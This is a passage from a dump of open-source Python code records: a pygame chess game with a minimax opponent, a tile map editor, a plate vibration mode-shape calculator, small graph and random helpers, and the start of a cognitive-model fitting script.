self._params[2]) * math.factorial(order)\n deriv /= (1 + self._params[2] * n_elec)**(order + 1)\n return deriv\n","repo_name":"theochem/chemtools","sub_path":"chemtools/conceptual/rational.py","file_name":"rational.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"27957001805","text":"import pygame\nimport sys\nimport time\nimport random\n\nfrom setting import Config, sounds\nfrom tools import OnBoard, Position\nfrom utils import ch\nfrom board import Board\nfrom Minimax.chessAI import Minimax\nimport ui\n\nclass Chess:\n def __init__(self, screen):\n self.screen = screen\n self.clock = pygame.time.Clock()\n self.gameOver = False\n self.board = Board()\n self.animateSpot = 1\n self.selectedPiece = None\n self.selectedPieceMoves = None\n self.selectedPieceCaptures = None\n self.positionsToPut = None\n self.captura = None \n self.draggedPiece = None\n self.IAGame = None\n self.AdjustedMouse = Position(0, 0)\n self.gameOverBackground = pygame.image.load(\"./assets/images/gameover3.jpg\")\n self.gameOverBackground = pygame.transform.smoothscale(self.gameOverBackground, Config.resolution)\n self.gameOverHeader = ui.TextUI(self.screen, \"GAME OVER\", Config.width//2, Config.height//6, 140, (255, 255, 255))\n self.gameOverHeader.centered = True\n self.winnerText = ui.TextUI(self.screen, \" \", Config.width//2, Config.height//2 + 30, 110, (255, 255, 255))\n self.winnerText.centered = True\n\n # Minimax(profundidad, tablero, activar poda alfa-beta = Default(true), uso de mapas de puntos = Default(true))\n self.ComputerAI = Minimax(Config.AI_DEPTH, self.board, True, True)\n\n def vsComputer(self):\n pygame.event.clear()\n sounds.game_start_sound.play()\n while not self.gameOver:\n self.IAGame = True\n self.clock.tick(Config.fps)\n self.screen.fill((0, 0, 0))\n self.getMousePosition()\n # Actualiza el titulo de la ventana\n pygame.display.set_caption(\"Chess : VS Computer \")\n self.display()\n self.ComputerMoves(1)\n if self.gameOver == False:\n if self.animateSpot >= Config.spotSize:\n self.HandleEvents()\n self.IsGameOver()\n\n def multiplayer(self):\n pygame.event.clear() # Limpia la cola de eventos\n sounds.game_start_sound.play() # Activa el sonido de inicio de juego\n while not self.gameOver: # Se ejecuta mientras gameover sea falso\n self.IAGame = False\n self.clock.tick(Config.fps)\n self.screen.fill((0, 0, 0))\n self.getMousePosition()\n # Actualiza el titulo de la ventana\n pygame.display.set_caption(\"Chess : Multiplayer \")\n self.display()\n if self.animateSpot >= Config.spotSize: # Si se terminó la animación\n self.HandleEvents() #Manejo de eventos\n self.IsGameOver()\n\n def display(self):\n \"Pantalla\"\n self.Render()\n pygame.display.update()\n\n def HandleEvents(self):\n \"Manejo de eventos\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # Si se cierra el programa\n self.gameOver = True # Juego terminado\n # cerrar Pygame\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYUP: # Se presiona una tecla\n if event.key == pygame.K_ESCAPE: #Si es escape\n self.gameOver = True\n # Si es arriba o abajo cambian el tema del tablero\n if event.key == pygame.K_UP:\n if Config.themeIndex < len(Config.themes) -1 :\n Config.themeIndex += 1\n else:\n Config.themeIndex = 0\n if event.key == pygame.K_DOWN:\n if Config.themeIndex > 0:\n Config.themeIndex -= 1\n else:\n Config.themeIndex = len(Config.themes) -1\n elif event.type == pygame.MOUSEBUTTONDOWN: # Si se da un click\n if event.button == 1:\n self.HandleOnLeftMouseButtonDown() # Presionar\n elif event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1:\n self.HandleOnLeftMouseButtonUp() # Soltar\n\n def ComputerMoves(self, player):\n \"Movimientos de la IA\"\n if self.board.player == player:\n piece, bestmove = self.ComputerAI.Start(0)\n if bestmove:\n if self.board.GetPiece(bestmove) != None:\n self.board.Move(piece, bestmove, captura = False, IAGame = True)\n if self.board.pieceToPromote != None:\n self.board.PromotePawn(self.board.pieceToPromote, 0)\n self.positionsToPut = self.board.GetPositionsToPut()\n nuevaPosicionCapturada = self.GeneratorOfIAPositions()\n self.board.PutCapturedPiece(nuevaPosicionCapturada)\n sounds.capture_sound.play()\n else:\n self.board.Move(piece, bestmove, captura = False, IAGame = True)\n if self.board.pieceToPromote != None:\n self.board.PromotePawn(self.board.pieceToPromote, 0)\n sounds.move_sound.play()\n self.positionsToPut = None\n self.board.SwitchTurn()\n\n def GeneratorOfIAPositions(self):\n randomTuple = random.choice(self.positionsToPut)\n x, y = randomTuple\n randomPosition = Position(x, y)\n return randomPosition\n \n def HandleOnLeftMouseButtonUp(self):\n \"Manejo de soltar el click izquierdo\"\n self.draggedPiece = None # Suelta la pieza\n if self.selectedPiece: # Si existe una pieza seleccionada\n if self.AdjustedMouse in self.selectedPieceCaptures: # Si la posición del mouse ajustada está en una posición de piezas a capturar\n self.board.Move(self.selectedPiece, self.AdjustedMouse, captura = True) # Mueve la pieza seleccionada para realizar la captura\n self.positionsToPut = self.board.GetPositionsToPut()\n sounds.capture_sound.play() # Activa el sonido de captura \n elif self.AdjustedMouse in self.selectedPieceMoves : # Si la posición del mouse ajustada está en una posición disponible para mover\n self.board.Move(self.selectedPiece, self.AdjustedMouse, captura = False) # Mueve la pieza seleccionada a la casilla\n self.board.SwitchTurn()\n sounds.move_sound.play() # Activa el sonido de movimiento\n \n self.ReleasePiece() # Libera la pieza\n\n def SelectPiece(self,piece):\n \"Seleccionar pieza\"\n if piece != None and piece.color == self.board.player: # Si hay una pieza y es del color del jugador actual\n self.selectedPiece = piece # Pieza seleccionada toma el valor de la pieza almacenada\n self.draggedPiece = piece # Pieza agarrada toma el valor de la pieza almacenada\n self.selectedPieceMoves, self.selectedPieceCaptures = self.board.GetAllowedMoves(self.selectedPiece) # Obtiene los movimientos posibles de la pieza agarrada junto con sus posibles capturas\n self.selectedOrigin = self.AdjustedMouse # Origen del seleccionado es la posición ajustada del mouse al momento de dar click\n\n def CheckEmptyPositions(self, position):\n nuevaPosicionCapturada = position.GetCopy()\n for posicion in self.positionsToPut:\n if nuevaPosicionCapturada.x == posicion[0] and nuevaPosicionCapturada.y == posicion[1]:\n # La nueva posición capturada es igual a una posición en la lista\n self.board.PutCapturedPiece(nuevaPosicionCapturada)\n self.positionsToPut = None\n self.board.SwitchTurn()\n break # Termina el bucle si se encuentra una coincidencia\n \n def HandleOnLeftMouseButtonDown(self):\n \"Manejo de presionar el click izquierdo\"\n # Si hay una pieza a promover y la posición ajustada del mouse es la misma que la de la pieza \n if self.board.pieceToPromote != None and self.AdjustedMouse.x == self.board.pieceToPromote.position.x: \n choice = self.AdjustedMouse.y\n if choice <= 3 and self.board.player == 0:\n # promote pawn\n self.board.PromotePawn(self.board.pieceToPromote, choice)\n # refresh screen\n self.display()\n elif choice > 3 and self.board.player == 1:\n # promote pawn\n self.board.PromotePawn(self.board.pieceToPromote, 7-choice)\n # refresh screen\n self.display()\n \n elif self.positionsToPut:\n nuevaPosicionCapturada = self.AdjustedMouse \n self.CheckEmptyPositions(nuevaPosicionCapturada) \n\n # Si no hay piezas a promover ni capturas \n else: \n if OnBoard(self.AdjustedMouse): # Si el mouse se encuentra dentro del tablero de juego\n piece = self.board.grid[self.AdjustedMouse.x][self.AdjustedMouse.y] # Almacena la pieza de la posición ajustada en la que dio click el mouse\n self.SelectPiece(piece)\n\n def getMousePosition(self):\n \"Obtener la posición ajustada del mouse\"\n x, y = pygame.mouse.get_pos()\n x = (x - Config.horizontal_offset) // Config.spotSize\n y = (y - Config.top_offset//2) // Config.spotSize\n self.AdjustedMouse = Position(x, y)\n\n def IsGameOver(self):\n \"Pregunta si el juego ha terminado\"\n if self.board.winner != None: #Si hay un ganador\n self.gameOver = True # Termina el juego (rompe el bucle)\n self.display() \n self.gameOverWindow()\n\n def ReleasePiece(self):\n \"Soltar pieza (reinicia todos los valores de la misma)\"\n self.selectedPiece = None\n self.selectedPieceMoves = None\n self.selectedPieceCaptures = None\n self.draggedPiece = None\n self.selectedOrigin = None\n\n def Render(self):\n \"Dibujar tablero, piezas y resaltados\"\n self.DrawChessBoard() #Tablero\n if self.animateSpot >= Config.spotSize: #Si la animación finalizó\n self.DrawPieces() #Dibuja las piezas\n self.DrawHighlight()\n if self.IAGame == True:\n if self.board.player == 0:\n self.DrawPositionsToPut()\n \n elif self.IAGame ==False: \n self.DrawPositionsToPut()\n \n def DrawChessBoard(self):\n \"Dibujar el tablero\"\n if self.animateSpot < Config.spotSize:\n self.animateSpot += 2\n for i in range(Config.boardSize):\n for j in range(Config.boardSize):\n x = i * Config.spotSize + Config.horizontal_offset\n y = j * Config.spotSize + Config.top_offset // 2\n if (i + j) % 2 == 0:\n pygame.draw.rect(self.screen, Config.themes[Config.themeIndex][\"light\"], [x, y, self.animateSpot, self.animateSpot])\n else:\n pygame.draw.rect(self.screen, Config.themes[Config.themeIndex][\"dark\"], [x, y, self.animateSpot, self.animateSpot])\n\n def DrawChessCoordinate(self):\n \"Dibujar coordenadas\"\n for i in range(Config.boardSize):\n _x = 0.05 * Config.spotSize + Config.horizontal_offset\n _y = 0.05 * Config.spotSize + Config.top_offset + i * Config.spotSize\n color = Config.themes[Config.themeIndex]['dark'] if i % 2 == 0 else Config.themes[Config.themeIndex]['light']\n\n fontRenderer = Config.CoordFont.render(str(8-i), True, color)\n self.screen.blit(fontRenderer, (_x, _y))\n\n _x = 0.9 * Config.spotSize + Config.horizontal_offset + i * Config.spotSize\n _y = (Config.boardSize - 1) * Config.spotSize + Config.top_offset + Config.spotSize * 0.75\n color = Config.themes[Config.themeIndex]['light'] if i % 2 == 0 else Config.themes[Config.themeIndex]['dark']\n\n fontRenderer = Config.CoordFont.render(chr(ord(\"a\")+ i), True, color)\n self.screen.blit(fontRenderer, (_x, _y))\n\n def DrawPieces(self):\n \"Dibuja las piezas\"\n # Dibuja posición vieja y nueva\n oldPosition, nPosition = self.board.RecentMovePositions()\n if oldPosition and nPosition:\n x1 = oldPosition.x * Config.spotSize + Config.horizontal_offset\n y1 = oldPosition.y * Config.spotSize + Config.top_offset // 2\n x2 = nPosition.x * Config.spotSize + Config.horizontal_offset\n y2 = nPosition.y * Config.spotSize + Config.top_offset // 2\n pygame.draw.rect(self.screen, (0, 100, 100), [x1, y1, Config.spotSize, Config.spotSize])\n pygame.draw.rect(self.screen, (225, 120, 120), [x2, y2, Config.spotSize, Config.spotSize]) \n\n #Dibuja los sprites de las piezas \n for x in range(Config.boardSize):\n for y in range(Config.boardSize):\n x_pos = x * Config.spotSize + Config.horizontal_offset\n y_pos = y * Config.spotSize + Config.top_offset // 2\n if self.board.grid[x][y] != None:\n self.screen.blit(self.board.grid[x][y].sprite, (x_pos, y_pos))\n\n def DrawPositionsToPut(self):\n if self.positionsToPut != None:\n for position_x, position_y in self.positionsToPut:\n x = position_x * Config.spotSize + Config.horizontal_offset\n y = position_y * Config.spotSize + Config.top_offset // 2\n pygame.draw.rect(self.screen, (29, 161, 20), [x, y, Config.spotSize, Config.spotSize], Config.highlightOutline)\n\n def RenderPromoteWindow(self):\n \"Ventana de promoción\"\n if self.board.pieceToPromote:\n if self.board.pieceToPromote.color == 0:\n x = self.board.pieceToPromote.position.x * Config.spotSize + Config.horizontal_offset\n y = self.board.pieceToPromote.position.y * Config.spotSize + Config.top_offset // 2\n pygame.draw.rect(self.screen, (200, 200, 200), [x, y, Config.spotSize , Config.spotSize * 4])\n for i in range(4):\n piece = self.board.whitePromotions[i]\n self.screen.blit(piece.sprite, (x, i * Config.spotSize + Config.top_offset //2 ))\n bottomY = i * Config.spotSize - 1\n pygame.draw.rect(self.screen, (0, 0, 0), [x, bottomY, Config.spotSize , 2])\n else:\n x = self.board.pieceToPromote.position.x * Config.spotSize + Config.horizontal_offset\n y = (self.board.pieceToPromote.position.y - 3) * Config.spotSize + Config.top_offset // 2\n pygame.draw.rect(self.screen, (200, 200, 200), [x, y, Config.spotSize , Config.spotSize * 4])\n for i in range(4):\n piece = self.board.blackPromotions[i]\n self.screen.blit(piece.sprite, (x, (i+4) * Config.spotSize + Config.top_offset //2 ))\n bottomY = (i + 4) * Config.spotSize - 1\n pygame.draw.rect(self.screen, (0, 0, 0), [x, bottomY, Config.spotSize , 2])\n\n def DrawHighlight(self):\n \"Dibujar resaltados\"\n # Resaltado pieza seleccionada\n if self.selectedPiece != None:\n x = self.selectedPiece.position.x * Config.spotSize + Config.horizontal_offset\n y = self.selectedPiece.position.y * Config.spotSize + Config.top_offset // 2\n pygame.draw.rect(self.screen, (190, 200, 222), [x, y, Config.spotSize, Config.spotSize])\n if self.draggedPiece == None:\n self.screen.blit(self.selectedPiece.sprite, (x, y))\n\n # Dibujar los movimientos posibles de la pieza seleccionada\n if self.selectedPiece and self.selectedPieceMoves:\n for move in self.selectedPieceMoves:\n x = move.x * Config.spotSize + Config.horizontal_offset\n y = move.y * Config.spotSize + Config.top_offset // 2\n pygame.draw.rect(self.screen, (15, 140, 131), [x, y, Config.spotSize, Config.spotSize], Config.highlightOutline)\n\n # Dibujar las posibles capturas de la pieza seleccionada\n if self.selectedPiece and self.selectedPieceCaptures:\n for capturing in self.selectedPieceCaptures:\n x = capturing.x * Config.spotSize + Config.horizontal_offset\n y = capturing.y * Config.spotSize + Config.top_offset // 2\n self.screen.blit(ch, (x, y))\n\n # pygame.draw.rect(self.screen, (210, 211, 190), [x, y, Config.spotSize, Config.spotSize], Config.highlightOutline)\n # Dibujar la pieza levantada\n if self.draggedPiece != None:\n x = self.AdjustedMouse.x * Config.spotSize + Config.horizontal_offset\n y = self.AdjustedMouse.y * Config.spotSize + Config.top_offset // 2\n self.screen.blit(self.draggedPiece.sprite, (x, y))\n\n # Resalta si está en jaque\n # Rey blanco en jaque\n if self.board.checkWhiteKing:\n x = self.board.WhiteKing.position.x * Config.spotSize + Config.horizontal_offset\n y = self.board.WhiteKing.position.y * Config.spotSize + Config.top_offset // 2\n pygame.draw.rect(self.screen, (240, 111, 150), [x, y, Config.spotSize, Config.spotSize])\n self.screen.blit(self.board.WhiteKing.sprite, (x, y))\n # Rey negro en jaque\n elif self.board.checkBlackKing:\n x = self.board.BlackKing.position.x * Config.spotSize + Config.horizontal_offset\n y = self.board.BlackKing.position.y * Config.spotSize + Config.top_offset // 2\n pygame.draw.rect(self.screen, (240, 111, 150), [x, y, Config.spotSize, Config.spotSize])\n self.screen.blit(self.board.BlackKing.sprite, (x, y))\n\n if self.animateSpot >= Config.spotSize:\n self.DrawChessCoordinate()\n\n self.RenderPromoteWindow()\n\n def gameOverWindow(self):\n \"Pantalla de juego terminada\"\n if self.board.winner >= 0: # Si alguno de los jugadores ganó\n sounds.game_over_sound.play() # Activa el sonido de juego terminado\n else: # Si empataron\n sounds.stalemate_sound.play() # Activa el sonido de tablas\n time.sleep(2) # Duerme el programa durante 2 segundos\n self.screen.blit(self.gameOverBackground, (0, 0)) # Muestra la imagen de Game Over\n self.gameOverHeader.Draw() # Dibuja el texto de Game Over\n if self.board.winner == 0:\n self.winnerText.text = \"GANA EL BLANCO\"\n self.winnerText.color = (255, 255, 255)\n self.screen.blit(self.board.WhiteKing.sprite, (Config.width//2 - Config.spotSize // 2, Config.height//3))\n elif self.board.winner == 1:\n self.winnerText.text = \"GANA EL NEGRO\"\n self.winnerText.color = (0, 0, 0)\n self.screen.blit(self.board.BlackKing.sprite, (Config.width//2 - Config.spotSize // 2, Config.height//3))\n else:\n self.winnerText.text = \"EMPATE\"\n self.winnerText.color = (179, 196, 195)\n\n self.gameOverHeader.Draw()\n self.winnerText.Draw()\n pygame.display.update()\n time.sleep(5)\n self.board = Board()\n self.animateSpot = 1\n","repo_name":"Juanfe008-source/IA-Proyecto-2","sub_path":"screens/chess.py","file_name":"chess.py","file_ext":"py","file_size_in_byte":19279,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10040170729","text":"\"\"\"\nMeloonatic Melons\nHPMRA Map Editor\nBy Harry Hitchen\n\nReport issues to\nmeloonatic.help@techie.com\n\nor send us a message at\nhttp://www.meloonaticmessage.btck.co.uk/MessageUs\n\"\"\"\n\n\nimport pygame, sys, math\nfrom scripts.Colors import *\nfrom scripts.textures import *\n\npygame.init()\n\ndef import_map(file):\n global tile_data\n with open(file, \"r\") as mapfile:\n map_data = mapfile.read()\n \n map_data = map_data.split(\"-\")\n\n map_size = map_data[len(map_data) - 1]\n map_data.remove(map_size)\n map_size = map_size.split(\",\")\n map_size[0] = int(map_size[0]) * Tiles.size\n map_size[1] = int(map_size[1]) * Tiles.size\n\n tiles = []\n\n for tile in range(len(map_data)):\n map_data[tile] = map_data[tile].replace(\"\\n\", \"\")\n tiles.append(map_data[tile].split(\":\"))\n for tile in tiles:\n tile[0] = tile[0].split(\",\")\n pos = tile[0]\n for p in pos:\n pos[pos.index(p)] = int(p)\n\n tiles[tiles.index(tile)] = [pos[0] * Tiles.size, pos[1] * Tiles.size, tile[1]]\n\n tile_data = tiles\n \n\n\ndef export_map(file):\n map_data = \"\"\n\n # Get Map Dimensions\n max_x = 0\n max_y = 0\n\n for t in tile_data:\n if t[0] > max_x:\n max_x = t[0]\n if t[1] > max_y:\n max_y = t[1]\n\n # Save Map Tiles\n for tile in tile_data:\n map_data = map_data + str(int(tile[0] / Tiles.size)) + \",\" + str(int(tile[1] / Tiles.size)) + \":\" + tile[2] + \"-\"\n \n\n # Save Map Dimensions\n map_data = map_data + str(int(max_x / Tiles.size)) + \",\" + str(int(max_y / Tiles.size))\n\n\n # Write Map File\n with open(file, \"w\") as mapfile:\n mapfile.write(map_data)\n\n\n\nwindow = pygame.display.set_mode((1280, 720), pygame.HWSURFACE)\npygame.display.set_caption(\"Map Editor\")\nclock = pygame.time.Clock()\n\n\ntxt_font = pygame.font.Font(\"C:\\\\Windows\\\\Fonts\\\\Verdana.ttf\", 20)\n\nmouse_pos = 0\nmouse_x, mouse_y = 0, 0\n\nmap_width, map_height = 8 * Tiles.size, 8 * Tiles.size\n\n\nselector = pygame.Surface((Tiles.size, Tiles.size), pygame.HWSURFACE|pygame.SRCALPHA)\nselector.fill(Color.with_alpha(100, Color.CornflowerBlue))\n\ntile_data = []\n\n\nbrush = \"5\"\n\n\n\n# Initialize Default Map\nfor x in range(0, map_width, Tiles.size):\n for y in range(0, map_height, Tiles.size):\n tile_data.append([x, y, \"1\"])\n\nprint(str(Tiles.Texture_tags))\n\n\nisRunning = True\n\n\nwhile isRunning:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n isRunning = False\n if event.type == pygame.KEYDOWN:\n\n\n # BRUSHES\n if event.key == pygame.K_F4:\n brush = \"r\"\n elif event.key == pygame.K_F1:\n selection = input(\"Brush Tag: \")\n brush = selection\n print(Tiles.Texture_tags[brush])\n\n #IMPORT MAP\n if event.key == pygame.K_F10:\n name = input(\"Map Name: \")\n import_map(name + \".map\")\n print(\"Map Loaded Successfully\")\n\n # SAVE MAP\n if event.key == pygame.K_F11:\n name = input(\"Map Name: \")\n export_map(name + \".map\")\n print(\"Map Saved Successfully!\")\n \n\n\n if event.type == pygame.MOUSEMOTION:\n mouse_pos = pygame.mouse.get_pos()\n mouse_x = math.floor(mouse_pos[0] / Tiles.size) * Tiles.size\n mouse_y = math.floor(mouse_pos[1] / Tiles.size) * Tiles.size\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n tile = [mouse_x, mouse_y, brush] # Keep this as a list\n\n # Is a tile already placed here?\n found = False\n for t in tile_data:\n if t[0] == tile[0] and t[1] == tile[1]:\n found = True\n break\n\n # If this tile space is empty\n if not found:\n if not brush == \"r\":\n tile_data.append(tile)\n\n # If this tile space is not empty\n else:\n # Are we using the rubber tool?\n if brush == \"r\":\n # Remove Tile\n for t in tile_data:\n if t[0] == tile[0] and t[1] == tile[1]:\n tile_data.remove(t)\n print(\"Tile Removed!\")\n\n else:\n # Sorry! A tile is already placed here!\n print(\"A tile is already placed here!\")\n \n\n\n\n # LOGIC\n\n\n\n\n # RENDER GRAPHICS\n\n window.fill(Color.Blue)\n\n\n # Draw Map\n for tile in tile_data:\n window.blit(Tiles.Texture_tags[tile[2]], (tile[0], tile[1]))\n\n # Draw Tile Highlighter (Selector)\n window.blit(selector, (mouse_x, mouse_y))\n \n \n\n pygame.display.update()\n\n clock.tick(60)\n\npygame.quit()\nsys.exit()\n","repo_name":"itsabugnotafeature/Raiders","sub_path":"map_editor.py","file_name":"map_editor.py","file_ext":"py","file_size_in_byte":4872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10057879043","text":"\"\"\"\nFunctions for the analytic expressions of rectangular plates (mode frequencies and mode shapes),\nthe computation of sampling step and of all the mode shapes satisfying sampling condition and maximum temporal frequency\n\"\"\"\n\nimport math\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef fmode(m, n, Lx, Ly, C, th):\n \"\"\"\n Returns the frequency in Hz of mode (m,n) for a rectangular plate\n :param m: mode order along x dimension\n :param n: mode order along y dimension\n :param Lx: length of plate along x dimension\n :param Ly: length of plate along y dimension\n :param C: speed of propagation\n :param th: thickness of plate\n :return: the temporal frequency in Hz for the mode (m, n) for a plate with given dimensions\n \"\"\"\n return 0.453 * C * th * ((m / Lx) ** 2 + (n / Ly) ** 2)\n\n\ndef cl(Eym, Rho, Nu):\n \"\"\"\n Returns the velocity of wave\n :param Eym: Young modulus\n :param Rho: density of material\n :param Nu: Poisson coefficient\n :return: propagation velocity\n \"\"\"\n return math.sqrt(Eym / (Rho * (1 - Nu ** 2)))\n\n\ndef z(x, y, m, n, Lx, Ly, A):\n \"\"\"\n Returns the mode shape of mode (m,n)\n :param x: x axis\n :param y: y axis\n :param m: mode order along x dimension\n :param n: mode order along y dimension\n :param Lx: length of plate along x dimension\n :param Ly: length of plate along y dimension\n :param A: amplitude of mode shape (can be set to 1)\n :return: the function of x and y describing the mode shape (displacement along z direction)\n \"\"\"\n return np.sin(m * math.pi * x / Lx) * np.sin(n * math.pi * y / Ly)\n\n\ndef create_grid(Lx, Ly, d):\n \"\"\"\n Creates a grid of points given the two dimensions of the\n rectangular plate and the distance between two samples\n :param Lx: length of plate along x dimension\n :param Ly: length of plate along y dimension\n :param d: sampling distance between two consecutive points\n :return: mesh of points\n \"\"\"\n x = np.arange(0, Lx + 0.0001, d)\n y = np.arange(0, Ly + 0.0001, d)\n x, y = np.meshgrid(x, y)\n return x, y\n\n\ndef plot_shape(shape):\n \"\"\"\n Plots the given mode shape as a 2D image\n :param shape: the mode shape to plot\n :return:\n \"\"\"\n plt.figure()\n plt.imshow(shape, cmap='coolwarm', origin='lower')\n plt.xlabel(\"[cm]\")\n plt.ylabel(\"[cm]\")\n plt.colorbar()\n\n\ndef modes_shapes(f_max, Lx, Ly, th, d, Eym, Rho, Nu):\n \"\"\"\n Given a plate's dimensions, finds all the modes that are below the given maximum temporal frequency and whose\n spatial frequency satisfies the sampling theorem for the given delta.\n Stores the mode order, its temporal freqeuncy and its mode shape\n :param f_max: the maximum temporal frequency\n :param Lx: length of plate along x dimension\n :param Ly: length of plate along y dimension\n :param th: thickness of plate\n :param d: sampling step between two consecutive points\n :param Eym: Young modulus\n :param Rho: density if material\n :param Nu: Poisson coefficient\n :return: a dictionary whose keys are the couples (m,n) of mode orders and values a tuple containing\n the corresponding temporal frequency and the mode shape\n \"\"\"\n C = cl(Eym, Rho, Nu)\n modes = find_modes(f_max, Lx, Ly, C, th)\n res = {}\n x, y = create_grid(Lx, Ly, d)\n\n for i, f in modes.items():\n (m, n) = i\n\n kx = m * np.pi / Lx\n ky = n * np.pi / Ly\n k_max = max(kx, ky)\n k_s = 1.2*(2*k_max)\n\n if k_s < 2*np.pi/d:\n shape = z(x, y, m, n, Lx, Ly, A=1)\n res[(m, n)] = (f, shape)\n\n return res\n\n\ndef find_modes(f_max, Lx, Ly, C, th):\n \"\"\"\n Given the plate dimensions and a maximum frequency, finds all the modes that are below to that frequency\n :param f_max: maximum temporal frequency to reach\n :param Lx: length along x dimension\n :param Ly: length along y dimension\n :param C: speed propagation\n :param th: thickness of plate\n :return: a dictionary whose keys are the couples of mode orders (m, n)\n and values the corresponding temporal frequencies\n \"\"\"\n modes = {}\n\n for m in range(1, 1000):\n f = fmode(m, 1, Lx, Ly, C, th)\n if f > f_max:\n break\n for n in range(1, 1000):\n f = fmode(m, n, Lx, Ly, C, th)\n if f > f_max:\n break\n else:\n modes[m, n] = f\n\n return modes\n\n\ndef delta_sampling_max(f_max, Lx, Ly, C, th):\n \"\"\"\n Finds the maximum delta needed to sample all mode shapes up to a given maximum frequency,\n given the plate dimensions\n :param f_max: maximum temporal frequency in Hz to reach\n :param Lx: length along x dimension\n :param Ly: length along y dimension\n :param C: speed of propagation\n :param th: thickness of plate\n :return: delta needed to sample the mode shape with maximum frequency (therefore all mode shapes up to\n that frequency\n \"\"\"\n modes = find_modes(f_max, Lx, Ly, C, th)\n f = 0\n for i in modes:\n if modes[i] > f:\n f = modes[i]\n (m, n) = i\n\n d = delta_sampling_mn(Lx, Ly, m, n)\n return d\n\n\ndef delta_sampling_mn(Lx, Ly, m, n):\n \"\"\"\n Computes the maximum delta needed to sample mode shape of order (m,n) given the plate dimensions\n Modes m and n determine two spatial frequencies kx, ky along the two axes: we need to make sure that the spatial\n sampling frequency (and therefore sampling delta) satisfies the Nyquist theorem with kmax = max(kx, ky)\n :param Lx: length of plate along x dimension\n :param Ly: length of plate along y dimension\n :param m: mode order along x dimension\n :param n: mode order along y dimension\n :return:\n \"\"\"\n kx = m * np.pi / Lx\n ky = n * np.pi / Ly\n kmax = max(kx, ky)\n ks = 1.2 * (2 * kmax)\n d = 2 * np.pi / ks\n return d\n\n\nlx = 0.8\nly = 0.8\n\nnu = 0.3\nE = 2.1e11\nrho = 7850\nh = 0.002\ndelta = 0.02\n\nc = cl(E, rho, nu)\n\nfmax = 2000\nfind = find_modes(fmax, lx, ly, c, h)\nmod = modes_shapes(fmax, lx, ly, h, delta, E, rho, nu)\n# to get list of modes: sorted(mod)\n# to plot a certain mode shape: plot_shape(mod[m,n][1])\n","repo_name":"polimi-ispl/modal-shape-interpolation-cnn","sub_path":"src/modeshapesPlate.py","file_name":"modeshapesPlate.py","file_ext":"py","file_size_in_byte":6155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26189365189","text":"from organdiae import *\nbs('trio')\ng = DiGraph()\nfor x in ['violin','viola','cello', 'plays','trio'] :\n\tng(x, name=True)\n\ng.ae(violin,trio,sb(plays))\ng.ae(viola,trio,sb(plays))\ng.ae(cello,trio,sb(plays))\ngv(g,path='ratherLimited')\nimport random\ndef rand_collect_length(l, f = lambda out, x : x, i=True, overshoot=True) :\n\tout = []\n\tsum = 0.0\n\twhile sum < l :\n\t\tv = f(out,random.random())\n\t\tif i : v = round(v)\n\t\tsum += v\n\t\tout.append(v)\n\tif not overshoot : out = out[:-1]\n\treturn out\n\ndef rand_collect_times(t, f = lambda out, x : x, i=True) :\n\tout = []\n\tfor x in range(t) :\n\t\tv = f(out,random.random())\n\t\tif i : v = round(v)\n\t\tout.append(v)\n\treturn out\n\n","repo_name":"mikesol/organdiae","sub_path":"doc/_downloads/deadline2.rst.py","file_name":"deadline2.rst.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19152970857","text":"# attempted implementation of the zhu et al (2017) model.\nimport numpy as np\nimport random\nimport utilities as utl\n\n# Apologies for this very non-object oriented way of doing things...\ndef getDetails():\n return({'name':'mZhu',\n 'authname':'Zhu',\n 'parmnames':['gamma','w0','w1','beta']\n })\n\ndef parmxform(parms,direction=1):\n #Zhu model log transforms only gamma and beta parms\n parms = np.array(parms)\n parms[0] = utl.logit_scale(parms[0], min=0, max=1, direction=direction)#utl.log_scale(parms[0],direction=direction)\n #XIAN! This is too hacky, please find a way to deal with it??\n if len(parms)>3:\n parms[3] = utl.log_scale(parms[3],direction=direction) \n return(parms)\n\n#For simplified model, use equations 7 to 12. Treat them as the values of each action\n# because we can treat Q(S*|uncued) as zero (because the authors say so)\ndef Qbar(w,gamma,delay,r):\n return (w[0]-w[1]) * (gamma**delay) * abs(r[0]+r[1])/ 2\n\ndef choice(Qi,Qn,beta):\n #Luce choice rule\n #p_inform = np.exp(beta*Qi) / (np.exp(beta*Qi) + np.exp(beta*Qn))\n p_inform = 1./(1 + np.exp(beta*(Qn-Qi)))\n return p_inform\n\n\ndef minthis(freeparms,data,task,fixVal,ivs=['delay'],minfun='negll',randseed=None,returnPreds = False):\n #Script to run some function to minimise\n #Free parms are in the order:\n #[gamma,w0,w1,beta]\n #Reverse-transform parms\n freeparms = parmxform(freeparms,direction=-1)\n #freeparms = utl.log_scale(freeparms,direction = -1)\n\n #Insert freeparm values into vector of all parms\n if fixVal==None:\n fixVal = [np.nan] * len(freeparms)\n fixVal = np.array(fixVal)\n freeIdx = np.isnan(fixVal)\n fixVal[freeIdx] = freeparms\n parms = fixVal\n\n # unpack learner parameters\n learner = dict(\n gamma = parms[0], # intertemporal discount parameter\n w0 = parms[1], #weight of better outcome\n w1 = parms[2], #weight of worse cue\n beta = parms[3], #Luce determinism\n )\n\n #Seed RNG if it's not None\n if not randseed is None:\n random.seed(randseed)\n\n # #Identify the IV\n # ivSet = iv + 'Set'\n \n # #Preallocate vector of predictions \n # preds = np.zeros(len(task[ivSet]))#matrix(0,1,length(delays))\n\n #Allow for multiple ivs -- have iv be a list of strings\n ivSet = []\n for iv in ivs:\n ivSet += [iv + 'Set']\n #delays = task['delays']\n nLevels = len(task[ivSet[0]])\n preds = np.zeros(nLevels)\n\n #for li,level in enumerate(task[ivSet]):\n for li in range(nLevels):\n for iv in ivs:\n task[iv] = task[iv + 'Set'][li] \n #task[iv] = level\n #Get Qbar 